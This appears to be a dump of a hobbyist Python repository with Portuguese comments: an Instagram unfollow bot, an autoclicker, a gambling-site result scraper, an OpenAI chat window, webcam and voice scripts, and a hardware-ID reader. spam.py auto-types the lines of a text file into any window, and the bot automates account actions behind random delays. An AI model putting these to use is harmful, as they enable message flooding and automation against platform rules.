json.loads(extract.group(1)) 98 | return response['entry_data']['ProfilePage'][0]['graphql']['user'] 99 | 100 | 101 | def get_followers_list(): 102 | followers_list = [] 103 | 104 | query_hash = '56066f031e6239f35a904ac20c9f37d9' 105 | variables = { 106 | "id":session.cookies['ds_user_id'], 107 | "include_reel":False, 108 | "fetch_mutual":False, 109 | "first":50 110 | } 111 | 112 | response = session.get(query_route, params={'query_hash': query_hash, 'variables': json.dumps(variables)}) 113 | while response.status_code != 200: 114 | time.sleep(600) 115 | response = session.get(query_route, params={'query_hash': query_hash, 'variables': json.dumps(variables)}) 116 | 117 | print('.', end='', flush=True) 118 | 119 | response = json.loads(response.text) 120 | 121 | for edge in response['data']['user']['edge_followed_by']['edges']: 122 | followers_list.append(edge['node']) 123 | 124 | while response['data']['user']['edge_followed_by']['page_info']['has_next_page']: 125 | variables['after'] = response['data']['user']['edge_followed_by']['page_info']['end_cursor'] 126 | 127 | time.sleep(2) 128 | 129 | response = session.get(query_route, params={'query_hash': query_hash, 'variables': json.dumps(variables)}) 130 | while response.status_code != 200: 131 | time.sleep(600) 132 | response = session.get(query_route, params={'query_hash': query_hash, 'variables': json.dumps(variables)}) 133 | 134 | print('.', end='', flush=True) 135 | 136 | response = json.loads(response.text) 137 | 138 | for edge in response['data']['user']['edge_followed_by']['edges']: 139 | followers_list.append(edge['node']) 140 | 141 | return followers_list 142 | 143 | 144 | def get_following_list(): 145 | follows_list = [] 146 | 147 | query_hash = 'c56ee0ae1f89cdbd1c89e2bc6b8f3d18' 148 | variables = { 149 | "id":session.cookies['ds_user_id'], 150 | "include_reel":False, 151 | "fetch_mutual":False, 152 | "first":50 153 | } 154 | 155 | response = session.get(query_route, params={'query_hash': query_hash, 'variables': json.dumps(variables)}) 156 | while response.status_code != 200: 157 | time.sleep(600) 158 | response = session.get(query_route, params={'query_hash': query_hash, 'variables': json.dumps(variables)}) 159 | 160 | print('.', end='', flush=True) 161 | 162 | response = json.loads(response.text) 163 | 164 | for edge in response['data']['user']['edge_follow']['edges']: 165 | follows_list.append(edge['node']) 166 | 167 | while response['data']['user']['edge_follow']['page_info']['has_next_page']: 168 | variables['after'] = response['data']['user']['edge_follow']['page_info']['end_cursor'] 169 | 170 | time.sleep(2) 171 | 172 | response = session.get(query_route, params={'query_hash': query_hash, 'variables': json.dumps(variables)}) 173 | while response.status_code != 200: 174 | time.sleep(600) 175 | response = session.get(query_route, params={'query_hash': query_hash, 'variables': json.dumps(variables)}) 176 | 177 | print('.', end='', flush=True) 178 | 179 | response = json.loads(response.text) 180 | 181 | for edge in response['data']['user']['edge_follow']['edges']: 182 | follows_list.append(edge['node']) 183 | 184 | return follows_list 185 | 186 | 187 | def unfollow(user): 188 | response = session.get(profile_route % (instagram_url, user['username'])) 189 | time.sleep(random.randint(2, 4)) 190 | 191 | # update header again, idk why it changed 192 | session.headers.update({ 193 | 'x-csrftoken': response.cookies['csrftoken'] 194 | }) 195 | 196 | response = session.post(unfollow_route % (instagram_url, user['id'])) 197 | response = json.loads(response.text) 198 | 199 | if response['status'] != 'ok': 200 | print('[\033[31m-\033[m] Erro ocorreu ao tentar parar de seguir {}. Tentando novamente em algum tempo...'.format(user['username'])) 201 | print('ERRO: {}'.format(response.text)) 202 | return False 203 | return True 204 | 205 | 206 | def main(): 207 | 208 | if not os.path.isdir(cache_dir): 209 | os.makedirs(cache_dir) 210 | 211 | if os.path.isfile(session_cache): 212 | with open(session_cache, 'rb') as f: 213 | session.cookies.update(pickle.load(f)) 214 | else: 215 | is_logged = login() 216 | if is_logged == False: 217 | sys.exit('Login falhou, verifique suas credenciais de USERNAME e PASSWORD') 218 | 219 | with open(session_cache, 'wb') as f: 220 | pickle.dump(session.cookies, f) 221 | 222 | time.sleep(random.randint(2, 4)) 223 | 224 | os.system('cls') 225 | print('\033[36m\n UNFOLLOW BOT - INSTAGRAM ') 226 | print('\033[36m Made by Kyogin // Franco \033[m') 227 | connected_user = get_user_profile(credentials.username) 228 | time.sleep(2) 229 | print('\n[\033[32m+\033[m] Você está agora conectado como {} ({} Seguidores, {} Seguindo)\n'.format(connected_user['username'], connected_user['edge_followed_by']['count'], connected_user['edge_follow']['count'])) 230 | 231 | time.sleep(random.randint(2, 4)) 232 | 233 | following_list = [] 234 | if os.path.isfile(following_cache): 235 | with open(following_cache, 'r') as f: 236 | following_list = json.load(f) 237 | print('[\033[32m+\033[m] Lista de seguidores carregada do cache') 238 | 239 | if len(following_list) != connected_user['edge_follow']['count']: 240 | if len(following_list) > 0: 241 | print('[\033[32m+\033[m] Reconstruindo lista de seguidores', end='', flush=True) 242 | else: 243 | print('[\033[32m+\033[m] Construindo lista de seguidores', end='', flush=True) 244 | following_list = get_following_list() 245 | print(' Feito') 246 | 247 | with open(following_cache, 'w') as f: 248 | json.dump(following_list, f) 249 | 250 | followers_list = [] 251 | if os.path.isfile(followers_cache): 252 | with open(followers_cache, 'r') as f: 253 | followers_list = json.load(f) 254 | print('[\033[32m+\033[m] Lista de seguidores carregada do cache') 255 | 256 | if len(followers_list) != connected_user['edge_followed_by']['count']: 257 | if len(following_list) > 0: 258 | print('[\033[32m+\033[m] Reconstruindo lista de seguidores', end='', flush=True) 259 | else: 260 | print('[\033[32m+\033[m] Construindo lista de seguidores', end='', flush=True) 261 | followers_list = get_followers_list() 262 | print(' Feito') 263 | 264 | with open(followers_cache, 'w') as f: 265 | json.dump(followers_list, f) 266 | 267 | followers_usernames = {user['username'] for user in followers_list} 268 | unfollow_users_list = [user for user in following_list if user['username'] not in followers_usernames] 269 | 270 | print('[\033[33m!\033[m] Voce está seguindo {} usuários que não te seguem de volta:'.format(len(unfollow_users_list))) 271 | for user in unfollow_users_list: 272 | print('[\033[33m>\033[m]',user['username']) 273 | 274 | if len(unfollow_users_list) > 0: 275 | print('\033[35m __________________________________________________\033[m') 276 | print('\n[\033[36m+\033[m] Começando a deixar de seguir...\n') 277 | 278 | for user in unfollow_users_list: 279 | if not os.environ.get('UNFOLLOW_VERIFIED') and user['is_verified'] == True: 280 | print('[\033[36mx\033[m] Pulando {} (\033[36m Perfil verificado \033[m)'.format(user['username'])) 281 | continue 282 | 283 | time.sleep(random.randint(10, 30)) 284 | 285 | print('[\033[31m-\033[m] Deixando de seguir: {}'.format(user['username'])) 286 | time.sleep(random.randint(1, 3) * 50) 287 | while unfollow(user) == False: 288 | time.sleep(random.randint(1, 3) * 3000) # High number on purpose 289 | 290 | print('\n Feito!"') 291 | 292 | 293 | if __name__ == "__main__": 294 | main() 295 | -------------------------------------------------------------------------------- /Unfollow bot/requirements.txt: -------------------------------------------------------------------------------- 1 | requests==2.25.1 2 | colorama -------------------------------------------------------------------------------- /VoiceRecognition.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import keyboard 3 | import speech_recognition as sr 4 | import os 5 | 6 | def ouvir_microfone(): 7 | #Habilita o microfone do usuário 8 | microfone = sr.Recognizer() 9 | 10 | #usando o microfone 11 | with sr.Microphone() as source: 12 | 13 | #Chama um algoritmo de reducao de ruidos no som 14 | microfone.adjust_for_ambient_noise(source) 15 | 16 | #Frase para o usuario dizer algo 17 | print("Diga alguma coisa: ") 18 | 19 | #Armazena o que foi dito numa variavel 20 | audio = microfone.listen(source) 21 | 22 | try: 23 | 24 | #Passa a variável para o algoritmo reconhecedor de padroes 25 | frase = microfone.recognize_google(audio,language='pt-BR') 26 | 27 | #Retorna a frase pronunciada 28 | print("Você disse: " + frase) 29 | 30 | #Se nao reconheceu o padrao de fala, exibe a mensagem 31 | except sr.UnknownValueError: 32 | print("Não entendi") 33 | 34 | return frase 35 | ouvir_microfone() -------------------------------------------------------------------------------- /autoclicker.py: -------------------------------------------------------------------------------- 1 | import mouse 2 | import time 3 | 4 | # Tempo de espera antes de começar, para você poder posicionar o mouse 5 | print("Iniciando em 5 segundos...") 6 | time.sleep(5) 7 | 8 | print("Clicando...") 9 | 10 | try: 11 | while True: 12 | mouse.click() 13 | time.sleep(0.0005) 14 | except KeyboardInterrupt: 15 | print("Programa interrompido pelo usuário.") 16 | -------------------------------------------------------------------------------- /blaze_Api.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import json 3 | 4 | URL_API = "https://blaze.com" 5 | 6 | class Browser(object): 7 | 8 | def __init__(self): 9 | self.response = None 10 | self.headers = self.get_headers() 11 | self.session = requests.Session() 12 | 13 | def get_headers(self): 14 | self.headers = { 15 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) " 16 | "Chrome/87.0.4280.88 Safari/537.36" 17 | } 18 | return self.headers 19 | 20 | def send_request(self, method, url, **kwargs): 21 | response = self.session.request(method, url, **kwargs) 22 | if response.status_code == 200: 23 | return response 24 | return None 25 | 26 | 27 | class BlazeAPI(Browser): 28 | 29 | def __init__(self): 30 | super().__init__() 31 | 32 | def get_last_doubles(self): 33 | self.response = self.send_request("GET", 34 | f"{URL_API}/api/roulette_games/recent", 35 | headers=self.headers) 36 | if self.response: 37 | result = {"items": [{"color": "branco" if i["color"] == 0 else "vermelho" if i["color"] == 1 else "verde", 38 | "value": i["roll"]} for i in self.response.json()]} 39 | return json.dumps(result, indent=4) 40 | return False 41 | 42 | def get_last_crashs(self): 43 | self.response = self.send_request("GET", 44 | f"{URL_API}/api/crash_games/recent", 45 | headers=self.headers) 46 | if self.response: 47 | result = {"items": [{"color": "preto" if float(i["crash_point"]) < 2 else "verde", "value": i["crash_point"]} 48 | for i in self.response.json()]} 49 | return json.dumps(result, indent=4) 50 | return False 51 | 52 | 53 | if __name__ == '__main__': 54 | ba = BlazeAPI() 55 | last_doubles = ba.get_last_doubles() 56 | print(last_doubles) 57 | 58 | last_crashs = ba.get_last_crashs() 59 | print(last_crashs) 60 | 61 | -------------------------------------------------------------------------------- /chat.py: -------------------------------------------------------------------------------- 1 | import tkinter as tk 2 | from tkinter import scrolledtext 3 | import openai 4 | 5 | # Cria a janela 6 | janela = tk.Tk() 7 | janela.title("Private Chat") 8 | 9 | # Cria o frame com a entrada de texto 10 | frame_entrada = tk.Frame(janela) 11 | frame_entrada.pack(side=tk.TOP) 12 | 13 | label_entrada = tk.Label(frame_entrada, text="Digite algo:") 14 | label_entrada.pack(side=tk.LEFT) 15 | 16 | entrada_texto = tk.Entry(frame_entrada, width=80) 17 | entrada_texto.pack(side=tk.LEFT) 18 | 19 | # Cria a saída rolável 20 | saida_texto = scrolledtext.ScrolledText(janela, width=80, height=10) 21 | saida_texto.pack(side=tk.TOP) 22 | 23 | # Define uma função para ser executada quando o botão for pressionado 24 | def exibir_texto(): 25 | 26 | openai.api_key = "sua api key" 27 | 28 | model_engine = "text-davinci-003" 29 | prompt = entrada_texto.get() 30 | 31 | completion = openai.Completion.create( 32 | engine=model_engine, 33 | prompt=prompt, 34 | max_tokens=1024, 35 | n=2, 36 | stop=None, 37 | temperature=0.4, 38 | ) 39 | 40 | 41 | response = completion.choices[0].text 42 | saida_texto.insert(tk.END, 'Você: ' + prompt + '\n') 43 | saida_texto.insert(tk.END, '\n' + response + "\n\n") 44 | entrada_texto.delete(0, tk.END) 45 | 46 | # Cria o botão 47 | botao = tk.Button(janela, text="Exibir", command=exibir_texto) 48 | botao.pack(side=tk.BOTTOM) 49 | 50 | # Inicia a janela 51 | janela.mainloop() 52 | -------------------------------------------------------------------------------- /imagecapture.py: -------------------------------------------------------------------------------- 1 | import cv2 2 | 3 | key = cv2. waitKey(1) 4 | webcam = cv2.VideoCapture(0) 5 | while True: 6 | try: 7 | check, frame = webcam.read() 8 | print(check) 9 | cv2.imshow("Capturando", frame) 10 | key = cv2.waitKey(1) 11 | if key == ord('s'): 12 | cv2.imwrite(filename='salva_img.jpg', img=frame) 13 | webcam.release() 14 | img_new = cv2.imread('salva_img.jpg', cv2.IMREAD_GRAYSCALE) 15 | img_new = cv2.imshow("Imagem Capturada", img_new) 16 | cv2.waitKey(1650) 17 | cv2.destroyAllWindows() 18 | 19 | img_ = cv2.imread('salva_img.jpg', cv2.IMREAD_ANYCOLOR) 20 | gray = cv2.cvtColor(img_, cv2.COLOR_BGR2GRAY) 21 | img_ = cv2.resize(gray,(500,400)) 22 | img_resized = cv2.imwrite(filename='salva_img-final.jpg', img=img_) 23 | 24 | break 25 | elif key == ord('q'): 26 | print("Desligando Câmera") 27 | webcam.release() 28 | print("Câmera off") 29 | print("Programa encerrado") 30 | cv2.destroyAllWindows() 31 | break 32 | 33 | except(KeyboardInterrupt): 34 | print("Desligando Câmera") 35 | webcam.release() 36 | print("Câmera off") 37 | print("Programa encerrado") 38 | cv2.destroyAllWindows() 39 | break 40 | -------------------------------------------------------------------------------- /spam.py: -------------------------------------------------------------------------------- 1 | #Coded by: Kyogin - Franco 2 | #How to use: You need to have a file named : Spamtext (txt) in the same folder 3 | #Requirements: pyautogui (pip install pyautogui) 4 | 5 | import pyautogui 6 | import time 7 | import os 8 | 9 | print('\n Você tem 5 segundos para entrar na tela desejada...') 10 | 11 | time.sleep(5) 12 | 13 | words = open("Spamtext.txt","r") 14 | 15 | contador = 0 16 | 17 | for word in words: 18 | os.system('cls') 19 | pyautogui.typewrite(word) 20 | print("Comentário número: ", contador) 21 | time.sleep(1) 22 | pyautogui.press("enter") 23 | contador = contador + 1 -------------------------------------------------------------------------------- /trythencontinue.py: -------------------------------------------------------------------------------- 1 | #This is an example 2 | #Code by Franco 3 | #27/03/2021 4 | # ------Lets Code! 5 | 6 | import time 7 | 8 | A = 1 9 | B = 2 10 | C = 3 11 | 12 | def showing(): 13 | print( A , B , C ) 14 | input() 15 | 16 | try: 17 | showing() 18 | print('Here you can put the code that you want to...') 19 | #code 20 | #code 21 | #code 22 | #code 23 | #code 24 | #code 25 | #code 26 | #code 27 | #code 28 | #code 29 | #code 30 | #code 31 | #code 32 | #code 33 | #code 34 | #code 35 | #code 36 | #code 37 | time.sleep(5) 38 | 39 | except Exception as e: 40 | print(e) 41 | pass -------------------------------------------------------------------------------- /uuid and biosserial.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | 3 | #current_machine_id está recebendo o get uuid da máquina 4 | current_machine_id = str(subprocess.check_output('wmic csproduct get uuid'), 'utf-8').split('\n')[1].strip() 5 | 6 | #current_machine_bios está recebendo o get serialnumber da bios 7 | current_machine_bios = str(subprocess.check_output('wmic bios get serialnumber'), 'utf-8').split('\n')[1].strip() 8 | 9 | print(current_machine_id) 10 | print(current_machine_bios) 11 | print('by: Matheus Franco') 12 | 13 | #Aqui voce pode criar ifs fazendo referencia a algum usuário. 14 | #Poderia ser requisitado que o usuário roda-se esse programa primeiramente em seu computador 15 | #afim de que fosse retornado XXXXXXXX-XXXX-XXXX-XXXXXXXXXXXX do UUID 16 | #e também um valor XXXXXXXXXXXXXXX da Bios 17 | #após fazer isso, poderia ser declarado no main uma variável onde( POR EXEMPLO ): 18 | 19 | # x = 'USER_UUID' 20 | # current_machine_id = str(subprocess.check_output('wmic csproduct get uuid'), 'utf-8').split('\n')[1].strip() 21 | 22 | #if x == current_machine_id: 23 | # ... 24 | --------------------------------------------------------------------------------